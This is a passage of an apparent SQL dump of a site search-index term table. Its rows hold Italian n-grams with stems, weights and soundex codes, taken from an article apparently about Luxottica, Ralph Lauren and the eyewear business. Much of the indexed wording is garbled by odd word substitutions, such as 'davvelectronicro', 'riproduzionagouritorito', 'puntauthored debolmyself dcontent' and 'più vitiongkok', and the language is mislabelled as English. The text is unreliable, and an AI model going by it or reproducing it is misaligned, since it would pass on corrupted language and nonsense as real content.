sfide',0,1,1.5333,'P6463213',1,'en'),(31321,'parliamo','parliamo',0,0,0.5333,'P645',1,'en'),(31322,'parliamo del','parliamo del',0,1,1.4,'P64534',1,'en'),(31323,'parliamo del nord','parliamo del nord',0,1,1.5667,'P64534563',1,'en'),(31324,'parti','parti',0,0,0.3333,'P630',1,'en'),(31325,'parti delete','parti delete',0,1,1.4,'P6343',1,'en'),(31326,'parti delete mondo','parti delete mondo',0,1,1.6,'P634353',1,'en'),(31327,'particolari','particolari',0,0,0.7333,'P63246',1,'en'),(31328,'particolari operazioni','particolari operazioni',0,1,1.7333,'P632461625',1,'en'),(31329,'particolari operazioni straordinarie','particolari operazioni straordinarie',0,1,2,'P632461625236356',1,'en'),(31330,'parziale','parzial',0,0,0.5333,'P624',1,'en'),(31331,'parziale scam','parzial scam',0,1,1.4333,'P62425',1,'en'),(31332,'parziale scam qualsiasi','parzial scam qualsiasi',0,1,1.7667,'P62425242',1,'en'),(31333,'passato abbiamo','passato abbiamo',0,1,1.5,'P2315',1,'en'),(31334,'passato abbiamo fatto','passato abbiamo fatto',0,1,1.7,'P231513',1,'en'),(31335,'passo','passo',0,0,0.3333,'P200',1,'en'),(31336,'passo successivo','passo successivo',0,1,1.5333,'P210',1,'en'),(31337,'passo successivo è','passo successivo è',0,1,1.6,'P210',1,'en'),(31338,'pensare','pensar',0,0,0.4667,'P526',1,'en'),(31339,'pensare al','pensar al',0,1,1.3333,'P5264',1,'en'),(31340,'pensare al lancio','pensar al lancio',0,1,1.5667,'P526452',1,'en'),(31341,'pensare gna','pensar gna',0,1,1.3667,'P52625',1,'en'),(31342,'pensare gna il','pensar gna il',0,1,1.4667,'P526254',1,'en'),(31343,'penso','penso',0,0,0.3333,'P520',1,'en'),(31344,'penso che','penso che',0,1,1.3,'P520',1,'en'),(31345,'penso che per','penso che per',0,1,1.4333,'P5216',1,'en'),(31346,'penso gna','penso gna',0,1,1.3,'P525',1,'en'),(31347,'penso gna la','penso gna la',0,1,1.4,'P5254',1,'en'),(31348,'penso gna un','penso gna un',0,1,1.4,'P525',1,'en'),(31349,'per acquistare','per acquistare',0,1,1.4667,'P6236',1,'en'),(31350,'per acquistare un','per acquistare un',0,1,1.5667,'P62365',1,'en'),(31351,'per gli','per gli',0,1,1.2333,'P624',1,'en'),(31352,'per gli occhiali','per gli occhiali',0,1,1.5333,'P62424',1,'en'),(31353,'per il','per il',0,1,1.2,'P640',2,'en'),(31354,'per il suo','per il suo',0,1,1.3333,'P642',1,'en'),(31355,'per loro','per loro',0,1,1.2667,'P646',1,'en'),(31356,'per loro esista','per loro esista',0,1,1.5,'P64623',1,'en'),(31357,'per tutta','per tutta',0,1,1.3,'P630',1,'en'),(31358,'per tutta la','per tutta la',0,1,1.4,'P634',1,'en'),(31359,'percentuale','percentual',0,0,0.7333,'P62534',1,'en'),(31360,'percentuale get','percentual get',0,1,1.5,'P6253423',1,'en'),(31361,'percentuale get older','percentual get older',0,1,1.7,'P6253423436',1,'en'),(31362,'perché','perché',0,0,0.4,'P620',1,'en'),(31363,'perché accanto','perché accanto',0,1,1.4667,'P6253',1,'en'),(31364,'perché accanto alla','perché accanto alla',0,1,1.6333,'P62534',1,'en'),(31365,'percorso','percorso',0,0,0.5333,'P6262',1,'en'),(31366,'percorso nell\'','percorso nell',0,1,1.4667,'P626254',1,'en'),(31367,'percorso nell\' organizzazione','percorso nell organizzazione',0,1,1.9667,'P62625462525',1,'en'),(31368,'permessi','permessi',0,0,0.5333,'P652',1,'en'),(31369,'permessi the','permessi the',0,1,1.4,'P6523',1,'en'),(31370,'permessi the licenze','permessi the licenze',0,1,1.6667,'P65234252',1,'en'),(31371,'permette','permett',0,0,0.5333,'P653',1,'en'),(31372,'permette di','permett di',0,1,1.3667,'P653',1,'en'),(31373,'permette di cost','permett di cost',0,1,1.5333,'P65323',1,'en'),(31374,'personal mentorsince','person mentorsince',0,1,1.6667,'P6254536252',1,'en'),(31375,'personal mentorsince you','person mentorsince you',0,1,1.8,'P6254536252',1,'en'),(31376,'persone','person',0,0,0.4667,'P625',1,'en'),(31377,'persone che','person che',0,1,1.3667,'P6252',1,'en'),(31378,'persone che sappiano','person che sappiano',0,1,1.6667,'P625215',1,'en'),(31379,'persone ed','person ed',0,1,1.3333,'P6253',1,'en'),(31380,'persone ed è','person ed è',0,1,1.4,'P6253',1,'en'),(31381,'pertaining','pertain',0,0,0.6667,'P6352',1,'en'),(31382,'pertaining to','pertain to',0,1,1.4333,'P63523',1,'en'),(31383,'pertaining to each','pertain to each',0,1,1.6,'P635232',1,'en'),(31384,'pertanto','pertanto',0,0,0.5333,'P6353',1,'en'),(31385,'pertanto vietate','pertanto vietate',0,1,1.5333,'P635313',1,'en'),(31386,'pertanto vietate la','pertanto vietate la',0,1,1.6333,'P6353134',1,'en'),(31387,'piccole','piccol',0,0,0.4667,'P240',1,'en'),(31388,'piccole e','piccol e',0,1,1.3,'P240',1,'en'),(31389,'piccole e medie','piccol e medie',0,1,1.5,'P2453',1,'en'),(31390,'piccole e piccolissime','piccol e piccolissime',0,1,1.7333,'P2412425',1,'en'),(31391,'piccole la','piccol la',0,1,1.3333,'P240',1,'en'),(31392,'piccole la cina','piccol la cina',0,1,1.5,'P2425',1,'en'),(31393,'piccolissime','piccolissim',0,0,0.8,'P2425',1,'en'),(31394,'piccolissime imprese','piccolissim imprese',0,1,1.6667,'P2425162',1,'en'),(31395,'piccolissime imprese agili','piccolissim imprese agili',0,1,1.8667,'P24251624',1,'en'),(31396,'piccolo','piccolo',0,0,0.4667,'P240',1,'en'),(31397,'piccolo non','piccolo non',0,1,1.3667,'P245',1,'en'),(31398,'piccolo non ha','piccolo non ha',0,1,1.4667,'P245',1,'en'),(31399,'più alla','più alla',0,1,1.2667,'P400',1,'en'),(31400,'più alla possibilità','più alla possibilità',0,1,1.6667,'P412143',1,'en'),(31401,'più exact','più exact',0,1,1.3,'P230',1,'en'),(31402,'più exact comunque','più exact comunque',0,1,1.6,'P23252',1,'en'),(31403,'più facile','più facile',0,1,1.3333,'P240',1,'en'),(31404,'più facile mother','più facile mother',0,1,1.5667,'P24536',1,'en'),(31405,'più grande','più grande',0,1,1.3333,'P2653',1,'en'),(31406,'più grande al','più grande al',0,1,1.4333,'P26534',1,'en'),(31407,'più importante','più importante',0,1,1.4667,'P516353',1,'en'),(31408,'più importante sia','più importante sia',0,1,1.6,'P5163532',1,'en'),(31409,'più lento','più lento',0,1,1.3,'P453',1,'en'),(31410,'più lento nello','più lento nello',0,1,1.5,'P45354',1,'en'),(31411,'più rilevante','più rilevante',0,1,1.4333,'P64153',1,'en'),(31412,'più rilevante è','più rilevante è',0,1,1.5,'P64153',1,'en'),(31413,'più robusto','più robusto',0,1,1.3667,'P6123',1,'en'),(31414,'più robusto e','più robusto e',0,1,1.4333,'P6123',1,'en'),(31415,'più si','più si',0,1,1.2,'P200',1,'en'),(31416,'più si tratta','più si tratta',0,1,1.4333,'P2363',1,'en'),(31417,'più vitiongkok','più vitiongkok',0,1,1.4667,'P352',1,'en'),(31418,'più vitiongkok a','più vitiongkok a',0,1,1.5333,'P352',1,'en'),(31419,'più volte','più volte',0,1,1.3,'P430',1,'en'),(31420,'più volte lei','più volte lei',0,1,1.4333,'P434',1,'en'),(31421,'poco','poco',0,0,0.2667,'P200',1,'en'),(31422,'poco abbiamo','poco abbiamo',0,1,1.4,'P215',1,'en'),(31423,'poco abbiamo stretto','poco abbiamo stretto',0,1,1.6667,'P2152363',1,'en'),(31424,'poi','poi',0,0,0.2,'P000',1,'en'),(31425,'poi abbiamo','poi abbiamo',0,1,1.3667,'P500',1,'en'),(31426,'poi abbiamo altre','poi abbiamo altre',0,1,1.5667,'P5436',1,'en'),(31427,'poi be','poi be',0,1,1.2,'P000',1,'en'),(31428,'poi be un','poi be un',0,1,1.3,'P500',1,'en'),(31429,'polonia','polonia',0,0,0.4667,'P450',1,'en'),(31430,'polonia o','polonia o',0,1,1.3,'P450',1,'en'),(31431,'polonia o los','polonia o los',0,1,1.4333,'P4542',1,'en'),(31432,'portafoglio','portafoglio',0,0,0.7333,'P63124',1,'en'),(31433,'portafoglio byblos','portafoglio byblos',0,1,1.6,'P63124142',1,'en'),(31434,'portafoglio byblos moschino','portafoglio byblos moschino',0,1,1.9,'P63124142525',1,'en'),(31435,'portafoglio di','portafoglio di',0,1,1.4667,'P631243',1,'en'),(31436,'portafoglio di andare','portafoglio di andare',0,1,1.7,'P631243536',1,'en'),(31437,'portafoglio e','portafoglio e',0,1,1.4333,'P63124',1,'en'),(31438,'portafoglio e the','portafoglio e the',0,1,1.5667,'P631243',1,'en'),(31439,'portafoglio marchi','portafoglio marchi',0,1,1.6,'P63124562',1,'en'),(31440,'portafoglio marchi più','portafoglio marchi più',0,1,1.7333,'P631245621',1,'en'),(31441,'portafoglio marchi sulla','portafoglio marchi sulla',0,1,1.8,'P631245624',1,'en'),(31442,'positiva','positiva',0,0,0.5333,'P231',1,'en'),(31443,'positiva di','positiva di',0,1,1.3667,'P2313',1,'en'),(31444,'positiva di luxottica','positiva di luxottica',0,1,1.7,'P23134232',1,'en'),(31445,'possibile','possibil',0,0,0.6,'P214',1,'en'),(31446,'possibile pensare','possibil pensare',0,1,1.5667,'P2141526',1,'en'),(31447,'possibile pensare al','possibil pensare al',0,1,1.6667,'P21415264',1,'en'),(31448,'possibili','possibili',0,0,0.6,'P214',1,'en'),(31449,'possibili nel','possibili nel',0,1,1.4333,'P21454',1,'en'),(31450,'possibili nel breve','possibili nel breve',0,1,1.6333,'P21454161',1,'en'),(31451,'possibilità','possibilità',0,0,0.7333,'P2143',1,'en'),(31452,'possibilità di','possibilità di',0,1,1.4667,'P2143',1,'en'),(31453,'possibilità di cost','possibilità di cost',0,1,1.6333,'P214323',1,'en'),(31454,'possibilità gna','possibilità gna',0,1,1.5,'P214325',1,'en'),(31455,'possibilità gna esista','possibilità gna esista',0,1,1.7333,'P21432523',1,'en'),(31456,'potuto','potuto',0,0,0.4,'P300',1,'en'),(31457,'potuto andarci','potuto andarci',0,1,1.4667,'P35362',1,'en'),(31458,'potuto andarci da','potuto andarci da',0,1,1.5667,'P353623',1,'en'),(31459,'preannunciato','preannunciato',0,0,0.8667,'P6523',1,'en'),(31460,'preannunciato prossime','preannunciato prossime',0,1,1.7333,'P65231625',1,'en'),(31461,'preannunciato prossime acquisizioni','preannunciato prossime acquisizioni',0,1,2,'P6523162525',1,'en'),(31462,'preferisco','preferisco',0,0,0.6667,'P6162',1,'en'),(31463,'preferisco parlare','preferisco parlare',0,1,1.6,'P61621646',1,'en'),(31464,'preferisco parlare di','preferisco parlare di',0,1,1.7,'P616216463',1,'en'),(31465,'prezzo','prezzo',0,0,0.4,'P620',1,'en'),(31466,'prezzo inferiore','prezzo inferiore',0,1,1.5333,'P62516',1,'en'),(31467,'prezzo inferiore ai','prezzo inferiore ai',0,1,1.6333,'P62516',1,'en'),(31468,'prima','prima',0,0,0.3333,'P650',1,'en'),(31469,'prima di','prima di',0,1,1.2667,'P653',1,'en'),(31470,'prima di pensare','prima di pensare',0,1,1.5333,'P6531526',1,'en'),(31471,'prima linea','prima linea',0,1,1.3667,'P6545',1,'en'),(31472,'prima linea integrare','prima linea integrare',0,1,1.7,'P6545326',1,'en'),(31473,'prima originate','prima originate',0,1,1.5,'P656253',1,'en'),(31474,'prima originate un','prima originate un',0,1,1.6,'P6562535',1,'en'),(31475,'primo','primo',0,0,0.3333,'P650',1,'en'),(31476,'primo anno','primo anno',0,1,1.3333,'P650',1,'en'),(31477,'primo anno di','primo anno di',0,1,1.4333,'P653',1,'en'),(31478,'primother','primoth',0,0,0.6,'P6536',1,'en'),(31479,'primother la','primoth la',0,1,1.4,'P65364',1,'en'),(31480,'primother la sfida','primoth la sfida',0,1,1.6,'P65364213',1,'en'),(31481,'privata','privata',0,0,0.4667,'P613',1,'en'),(31482,'privata che','privata che',0,1,1.3667,'P6132',1,'en'),(31483,'privata che fa','privata che fa',0,1,1.4667,'P61321',1,'en'),(31484,'profondità','profondità',0,0,0.6667,'P6153',1,'en'),(31485,'profondità dobbas','profondità dobbas',0,1,1.5667,'P615312',1,'en'),(31486,'profondità dobbas simply','profondità dobbas simply',0,1,1.8,'P615312514',1,'en'),(31487,'propria','propria',0,0,0.4667,'P616',1,'en'),(31488,'propria organizzazione','propria organizzazione',0,1,1.7333,'P6162525',1,'en'),(31489,'prossime','prossim',0,0,0.5333,'P625',1,'en'),(31490,'prossime acquisizioni','prossim acquisizioni',0,1,1.7,'P62525',1,'en'),(31491,'prossime acquisizioni with','prossim acquisizioni with',0,1,1.8667,'P625253',1,'en'),(31492,'providing ogni','provid ogni',0,1,1.4667,'P613525',1,'en'),(31493,'providing ogni diritto','provid ogni diritto',0,1,1.7333,'P613525363',1,'en'),(31494,'pubblica','pubblica',0,0,0.5333,'P420',1,'en'),(31495,'pubblica per','pubblica per',0,1,1.4,'P4216',1,'en'),(31496,'pubblica per acquistare','pubblica per acquistare',0,1,1.7667,'P4216236',1,'en'),(31497,'punta','punta',0,0,0.3333,'P530',1,'en'),(31498,'punta assolutamente','punta assolutamente',0,1,1.6333,'P5324353',1,'en'),(31499,'punta assolutamente n\',','punta assolutamente n',0,1,1.7667,'P53243535',1,'en'),(31500,'puntando','puntando',0,0,0.5333,'P5353',1,'en'),(31501,'puntando a','puntando a',0,1,1.3333,'P5353',1,'en'),(31502,'puntando a una','puntando a una',0,1,1.4667,'P53535',1,'en'),(31503,'puntauthored','puntauthor',0,0,0.8,'P5363',1,'en'),(31504,'puntauthored debolmyself','puntauthor debolmyself',0,1,1.8,'P5363145241',1,'en'),(31505,'puntauthored debolmyself dcontent','puntauthor debolmyself dcontent',0,1,2,'P5363145241325353',1,'en'),(31506,'punti','punti',0,0,0.3333,'P530',1,'en'),(31507,'punti vendita','punti vendita',0,1,1.4333,'P53153',1,'en'),(31508,'punti vendita gna','punti vendita gna',0,1,1.5667,'P5315325',1,'en'),(31509,'può','può',0,0,0.2,'P000',1,'en'),(31510,'può service','può service',0,1,1.3667,'P2612',1,'en'),(31511,'può service tutto','può service tutto',0,1,1.5667,'P26123',1,'en'),(31512,'put documentamo','put documentamo',0,1,1.5,'P32535',1,'en'),(31513,'put documentamo trovare','put documentamo trovare',0,1,1.7667,'P325353616',1,'en'),(31514,'qual','qual',0,0,0.2667,'Q400',1,'en'),(31515,'qual è','qual è',0,1,1.2,'Q400',1,'en'),(31516,'qual è are','qual è are',0,1,1.3333,'Q460',1,'en'),(31517,'qual è il','qual è il',0,1,1.3,'Q400',1,'en'),(31518,'qualche','qualch',0,0,0.4667,'Q420',1,'en'),(31519,'qualche società','qualch società',0,1,1.5,'Q423',1,'en'),(31520,'qualche società delete','qualch società delete',0,1,1.7333,'Q42343',1,'en'),(31521,'qualche speed','qualch speed',0,1,1.4333,'Q4213',1,'en'),(31522,'qualche speed c\'','qualch speed c',0,1,1.5333,'Q42132',1,'en'),(31523,'quali','quali',0,0,0.3333,'Q400',1,'en'),(31524,'quali marchi','quali marchi',0,1,1.4,'Q4562',1,'en'),(31525,'quali marchi sono','quali marchi sono',0,1,1.5667,'Q45625',1,'en'),(31526,'quali mercati','quali mercati',0,1,1.4333,'Q45623',1,'en'),(31527,'quali mercati emergenti','quali mercati emergenti',0,1,1.7667,'Q4562356253',1,'en'),(31528,'quali sono','quali sono',0,1,1.3333,'Q425',1,'en'),(31529,'quali sono oggi','quali sono oggi',0,1,1.5,'Q4252',1,'en'),(31530,'qualità','qualità',0,0,0.4667,'Q430',1,'en'),(31531,'qualità rvitamin','qualità rvitamin',0,1,1.5333,'Q436135',1,'en'),(31532,'qualità rvitamin ysturanno','qualità rvitamin ysturanno',0,1,1.8667,'Q4361352365',1,'en'),(31533,'qualsiasi','qualsiasi',0,0,0.6,'Q420',1,'en'),(31534,'qualsiasi modalit','qualsiasi modalit',0,1,1.5667,'Q425343',1,'en'),(31535,'qualsiasi modalit e','qualsiasi modalit e',0,1,1.6333,'Q425343',1,'en'),(31536,'quasi','quasi',0,0,0.3333,'Q000',1,'en'),(31537,'quasi 4','quasi 4',0,1,1.2333,'Q000',1,'en'),(31538,'quasi 4 7','quasi 4 7',0,1,1.3,'Q000',1,'en'),(31539,'quasi l\'','quasi l',0,1,1.2667,'Q400',1,'en'),(31540,'quasi l\' 85','quasi l 85',0,1,1.3667,'Q400',1,'en'),(31541,'quatst\'','quatst',0,0,0.4667,'Q323',1,'en'),(31542,'quatst\' anno','quatst anno',0,1,1.4,'Q3235',1,'en'),(31543,'quatst\' anno supererà','quatst anno supererà',0,1,1.7,'Q3235216',1,'en'),(31544,'quatsto','quatsto',0,0,0.4667,'Q323',1,'en'),(31545,'quatsto è','quatsto è',0,1,1.3,'Q323',1,'en'),(31546,'quatsto è davvelectronicro','quatsto è davvelectronicro',0,1,1.8667,'Q32314236526',1,'en'),(31547,'quell\'','quell',0,0,0.4,'Q400',1,'en'),(31548,'quell\' iniziativa','quell iniziativa',0,1,1.5667,'Q45231',1,'en'),(31549,'quell\' iniziativa privata','quell iniziativa privata',0,1,1.8333,'Q45231613',1,'en'),(31550,'quella','quella',0,0,0.4,'Q400',2,'en'),(31551,'quella di','quella di',0,1,1.3,'Q430',1,'en'),(31552,'quella di gestire','quella di gestire',0,1,1.5667,'Q43236',1,'en'),(31553,'quella di realizzare','quella di realizzare',0,1,1.6667,'Q436426',1,'en'),(31554,'quest\'','quest',0,0,0.4,'Q300',1,'en'),(31555,'quest\' anno','quest anno',0,1,1.3667,'Q350',1,'en'),(31556,'quest\' anno luxottica','quest anno luxottica',0,1,1.7,'Q354232',1,'en'),(31557,'quest\' anno nii','quest anno nii',0,1,1.5,'Q350',1,'en'),(31558,'questa direzione','questa direzione',0,1,1.5333,'Q3625',1,'en'),(31559,'questa direzione e','questa direzione e',0,1,1.6,'Q3625',1,'en'),(31560,'questa percentuale','questa percentuale',0,1,1.6,'Q3162534',1,'en'),(31561,'questa percentuale get','questa percentuale get',0,1,1.7333,'Q316253423',1,'en'),(31562,'questo','questo',0,0,0.4,'Q300',1,'en'),(31563,'questo ci','questo ci',0,1,1.3,'Q320',1,'en'),(31564,'questo ci permette','questo ci permette',0,1,1.6,'Q321653',1,'en'),(31565,'questo dobbiamo','questo dobbiamo',0,1,1.5,'Q315',1,'en'),(31566,'questo dobbiamo curare','questo dobbiamo curare',0,1,1.7333,'Q31526',1,'en'),(31567,'questo genere','questo genere',0,1,1.4333,'Q3256',1,'en'),(31568,'questo genere dobbiamo','questo genere dobbiamo',0,1,1.7333,'Q3256315',1,'en'),(31569,'questo genere la','questo genere la',0,1,1.5333,'Q32564',1,'en'),(31570,'questo noi','questo noi',0,1,1.3333,'Q350',1,'en'),(31571,'questo noi dobbiamo','questo noi dobbiamo',0,1,1.6333,'Q35315',1,'en'),(31572,'questo servizio','questo servizio',0,1,1.5,'Q32612',1,'en'),(31573,'questo servizio altrat','questo servizio altrat',0,1,1.7333,'Q326124363',1,'en'),(31574,'questo significa','questo significa',0,1,1.5333,'Q32512',1,'en'),(31575,'questo significa gna','questo significa gna',0,1,1.6667,'Q325125',1,'en'),(31576,'quindi','quindi',0,0,0.4,'Q530',1,'en'),(31577,'quindi il','quindi il',0,1,1.3,'Q534',1,'en'),(31578,'quindi il tasso','quindi il tasso',0,1,1.5,'Q53432',1,'en'),(31579,'raggiungeremo','raggiungeremo',0,0,0.8667,'R25265',1,'en'),(31580,'raggiungeremo mum','raggiungeremo mum',0,1,1.5667,'R25265',1,'en'),(31581,'raggiungeremo mum i','raggiungeremo mum i',0,1,1.6333,'R25265',1,'en'),(31582,'ralph lauren italia','ralph lauren italia',0,1,1.6333,'R4146534',4,'en'),(31583,'ralph lauren siamo','ralph lauren siamo',0,1,1.6,'R4146525',1,'en'),(31584,'ray','rai',0,0,0.2,'R000',1,'en'),(31585,'ray ban','rai ban',0,1,1.2333,'R150',1,'en'),(31586,'ray ban of','rai ban of',0,1,1.3333,'R151',1,'en'),(31587,'rayban','rayban',0,0,0.4,'R150',1,'en'),(31588,'rayban il','rayban il',0,1,1.3,'R154',1,'en'),(31589,'rayban il vostro','rayban il vostro',0,1,1.5333,'R1541236',1,'en'),(31590,'rcs','rc',0,0,0.2,'R200',1,'en'),(31591,'rcs attraverso','rc attraverso',0,1,1.4667,'R236162',1,'en'),(31592,'rcs attraverso are','rc attraverso are',0,1,1.6,'R2361626',1,'en'),(31593,'rcs chi','rc chi',0,1,1.2333,'R200',1,'en'),(31594,'rcs chi intendesse','rc chi intendesse',0,1,1.6,'R253532',1,'en'),(31595,'rcs e','rc e',0,1,1.1667,'R200',1,'en'),(31596,'rcs e sono','rc e sono',0,1,1.3333,'R250',1,'en'),(31597,'realizzare','realizzar',0,0,0.6667,'R426',1,'en'),(31598,'realizzare una','realizzar una',0,1,1.4667,'R4265',1,'en'),(31599,'realizzare una struttura','realizzar una struttura',0,1,1.8,'R426523636',1,'en'),(31600,'realtà','realtà',0,0,0.4,'R430',1,'en'),(31601,'realtà gna','realtà gna',0,1,1.3333,'R4325',1,'en'),(31602,'realtà gna è','realtà gna è',0,1,1.4,'R4325',1,'en'),(31603,'realtà italiana','realtà italiana',0,1,1.5,'R4345',1,'en'),(31604,'realtà italiana gna','realtà italiana gna',0,1,1.6333,'R434525',1,'en'),(31605,'regard','regard',0,0,0.4,'R263',3,'en'),(31606,'regard to','regard to',0,1,1.3,'R263',3,'en'),(31607,'regard to luxottica','regard to luxottica',0,1,1.6333,'R2634232',1,'en'),(31608,'regarding esigenze','regard esigenze',0,1,1.6,'R2635252',1,'en'),(31609,'regarding esigenze of','regard esigenze of',0,1,1.7,'R26352521',1,'en'),(31610,'reperibili','reperibili',0,0,0.6667,'R1614',1,'en'),(31611,'reperibili attraverso','reperibili attraverso',0,1,1.7,'R161436162',1,'en'),(31612,'reperibili attraverso questo','reperibili attraverso questo',0,1,1.9333,'R1614361623',1,'en'),(31613,'result of anni','result of anni',0,1,1.4667,'R24315',1,'en'),(31614,'rete','rete',0,0,0.2667,'R300',1,'en'),(31615,'rete di','rete di',0,1,1.2333,'R300',1,'en'),(31616,'rete di negozi','rete di negozi',0,1,1.4667,'R352',1,'en'),(31617,'riconosce','riconosc',0,0,0.6,'R252',1,'en'),(31618,'riconosce i','riconosc i',0,1,1.3667,'R252',1,'en'),(31619,'riconosce i valori','riconosc i valori',0,1,1.6,'R252146',1,'en'),(31620,'rilevante','rilevant',0,0,0.6,'R4153',1,'en'),(31621,'rilevante abbiamo','rilevant abbiamo',0,1,1.5667,'R415315',1,'en'),(31622,'rilevante abbiamo una','rilevant abbiamo una',0,1,1.7,'R415315',1,'en'),(31623,'rilevante è','rilevant è',0,1,1.3667,'R4153',1,'en'),(31624,'rilevante è not','rilevant è not',0,1,1.5,'R415353',1,'en'),(31625,'riproduzionagouritorito','riproduzionagouritorito',0,0,1,'R1632526363',1,'en'),(31626,'riproduzionagouritorito dagouritoritoi','riproduzionagouritorito dagouritoritoi',0,1,2,'R163252636326363',1,'en'),(31627,'riproduzionagouritorito dagouritoritoi marchi','riproduzionagouritorito dagouritoritoi marchi',0,1,2,'R163252636326363562',1,'en'),(31628,'riproduzione','riproduzion',0,0,0.8,'R16325',1,'en'),(31629,'riproduzione anche','riproduzion anche',0,1,1.6,'R163252',1,'en'),(31630,'riproduzione anche parziale','riproduzion anche parziale',0,1,1.9,'R1632521624',1,'en'),(31631,'risorse','risors',0,0,0.4667,'R262',1,'en'),(31632,'risorse giovani','risors giovani',0,1,1.5,'R26215',1,'en'),(31633,'risorse giovani di','risors giovani di',0,1,1.6,'R262153',1,'en'),(31634,'risponde','rispond',0,0,0.5333,'R2153',1,'en'),(31635,'risponde disadvantage','rispond disadvantage',0,1,1.7,'R2153231532',1,'en'),(31636,'risponde disadvantage una','rispond disadvantage una',0,1,1.8333,'R21532315325',1,'en'),(31637,'risultato deletela','risultato deletela',0,1,1.6,'R243434',1,'en'),(31638,'risultato deletela macchina','risultato deletela macchina',0,1,1.9,'R243434525',1,'en'),(31639,'ritorna','ritorna',0,0,0.4667,'R365',1,'en'),(31640,'ritorna anche','ritorna anche',0,1,1.4333,'R3652',1,'en'),(31641,'ritorna anche se','ritorna anche se',0,1,1.5333,'R3652',1,'en'),(31642,'riutilizzo','riutilizzo',0,0,0.6667,'R342',1,'en'),(31643,'riutilizzo at','riutilizzo at',0,1,1.4333,'R3423',1,'en'),(31644,'riutilizzo at thelizabeth','riutilizzo at thelizabeth',0,1,1.8333,'R34234213',1,'en'),(31645,'rivendita','rivendita',0,0,0.6,'R153',1,'en'),(31646,'rivendita e','rivendita e',0,1,1.3667,'R153',1,'en'),(31647,'rivendita e la','rivendita e la',0,1,1.4667,'R1534',1,'en'),(31648,'robusto','robusto',0,0,0.4667,'R123',2,'en'),(31649,'robusto e','robusto e',0,1,1.3,'R123',1,'en'),(31650,'robusto e una','robusto e una',0,1,1.4333,'R1235',1,'en'),(31651,'romania','romania',0,0,0.4667,'R500',1,'en'),(31652,'romania chicago','romania chicago',0,1,1.5,'R520',1,'en'),(31653,'romania chicago polonia','romania chicago polonia',0,1,1.7667,'R52145',1,'en'),(31654,'rvitamin','rvitamin',0,0,0.5333,'R135',1,'en'),(31655,'rvitamin ysturanno','rvitamin ysturanno',0,1,1.6,'R1352365',1,'en'),(31656,'rvitamin ysturanno cat','rvitamin ysturanno cat',0,1,1.7333,'R135236523',1,'en'),(31657,'sale','sale',0,0,0.2667,'S400',4,'en'),(31658,'sale possibili','sale possibili',0,1,1.4667,'S41214',1,'en'),(31659,'sale possibili nel','sale possibili nel',0,1,1.6,'S4121454',1,'en'),(31660,'sapere','saper',0,0,0.4,'S160',1,'en'),(31661,'sapere includere','saper includere',0,1,1.5333,'S1652436',1,'en'),(31662,'sapere includere culture','saper includere culture',0,1,1.8,'S16524362436',1,'en'),(31663,'sappiano','sappiano',0,0,0.5333,'S150',1,'en'),(31664,'sappiano dare','sappiano dare',0,1,1.4333,'S1536',1,'en'),(31665,'sappiano dare un','sappiano dare un',0,1,1.5333,'S15365',1,'en'),(31666,'sappiano lavorare','sappiano lavorare',0,1,1.5667,'S15416',1,'en'),(31667,'sappiano lavorare in','sappiano lavorare in',0,1,1.6667,'S154165',1,'en'),(31668,'sat','sat',0,0,0.2,'S300',1,'en'),(31669,'sat thelizabethrvizio','sat thelizabethrvizio',0,1,1.7,'S34213612',1,'en'),(31670,'sat thelizabethrvizio at','sat thelizabethrvizio at',0,1,1.8,'S342136123',1,'en'),(31671,'satgno','satgno',0,0,0.4,'S325',1,'en'),(31672,'satgno distintivo','satgno distintivo',0,1,1.5667,'S325323531',1,'en'),(31673,'satgno distintivo di','satgno distintivo di',0,1,1.6667,'S3253235313',1,'en'),(31674,'saturo','saturo',0,0,0.4,'S360',1,'en'),(31675,'saturo e','saturo e',0,1,1.2667,'S360',1,'en'),(31676,'saturo e si','saturo e si',0,1,1.3667,'S362',1,'en'),(31677,'scala','scala',0,0,0.3333,'S400',1,'en'),(31678,'scala in','scala in',0,1,1.2667,'S450',1,'en'),(31679,'scala in assoluto','scala in assoluto',0,1,1.5667,'S45243',1,'en'),(31680,'scam','scam',0,0,0.2667,'S500',2,'en'),(31681,'scam burberry','scam burberry',0,1,1.4333,'S51616',1,'en'),(31682,'scam burberry e','scam burberry e',0,1,1.5,'S51616',1,'en'),(31683,'scam la','scam la',0,1,1.2333,'S540',1,'en'),(31684,'scam la struttura','scam la struttura',0,1,1.5667,'S5423636',1,'en'),(31685,'scam qualsiasi','scam qualsiasi',0,1,1.4667,'S5242',1,'en'),(31686,'scam qualsiasi modalit','scam qualsiasi modalit',0,1,1.7333,'S52425343',1,'en'),(31687,'scaturire','scaturir',0,0,0.6,'S360',1,'en'),(31688,'scaturire marchi','scaturir marchi',0,1,1.5333,'S36562',1,'en'),(31689,'scaturire marchi e','scaturir marchi e',0,1,1.6,'S36562',1,'en'),(31690,'scoprire','scoprir',0,0,0.5333,'S160',1,'en'),(31691,'scoprire los','scoprir los',0,1,1.4,'S1642',1,'en'),(31692,'scoprire los angeles','scoprir los angeles',0,1,1.6667,'S16425242',1,'en'),(31693,'scorsi','scorsi',0,0,0.4,'S620',1,'en'),(31694,'scorsi abbiamo','scorsi abbiamo',0,1,1.4667,'S6215',1,'en'),(31695,'scorsi abbiamo lanciato','scorsi abbiamo lanciato',0,1,1.7667,'S62154523',1,'en'),(31696,'scorso','scorso',0,0,0.4,'S620',1,'en'),(31697,'scorso quasi','scorso quasi',0,1,1.4,'S620',1,'en'),(31698,'scorso quasi 4','scorso quasi 4',0,1,1.4667,'S620',1,'en'),(31699,'se for','se for',0,1,1.2,'S160',1,'en'),(31700,'se for lo','se for lo',0,1,1.3,'S164',1,'en'),(31701,'se li','se li',0,1,1.1667,'S400',1,'en'),(31702,'se li raggiungeremo','se li raggiungeremo',0,1,1.6333,'S4625265',1,'en'),(31703,'seguire','seguir',0,0,0.4667,'S600',1,'en'),(31704,'seguire la','seguir la',0,1,1.3333,'S640',1,'en'),(31705,'seguire la congiuntura','seguir la congiuntura',0,1,1.7333,'S64252536',1,'en'),(31706,'semplicità','semplicità',0,0,0.6667,'S51423',1,'en'),(31707,'semplicità velocità','semplicità velocità',0,1,1.6333,'S514231423',1,'en'),(31708,'semplicità velocità umiltà','semplicità velocità umiltà',0,1,1.8667,'S514231423543',1,'en'),(31709,'senza','senza',0,0,0.3333,'S520',1,'en'),(31710,'senza particolari','senza particolari',0,1,1.5667,'S52163246',1,'en'),(31711,'senza particolari operazioni','senza particolari operazioni',0,1,1.9333,'S521632461625',1,'en'),(31712,'serenità','serenità',0,0,0.5333,'S653',1,'en'),(31713,'serenità o','serenità 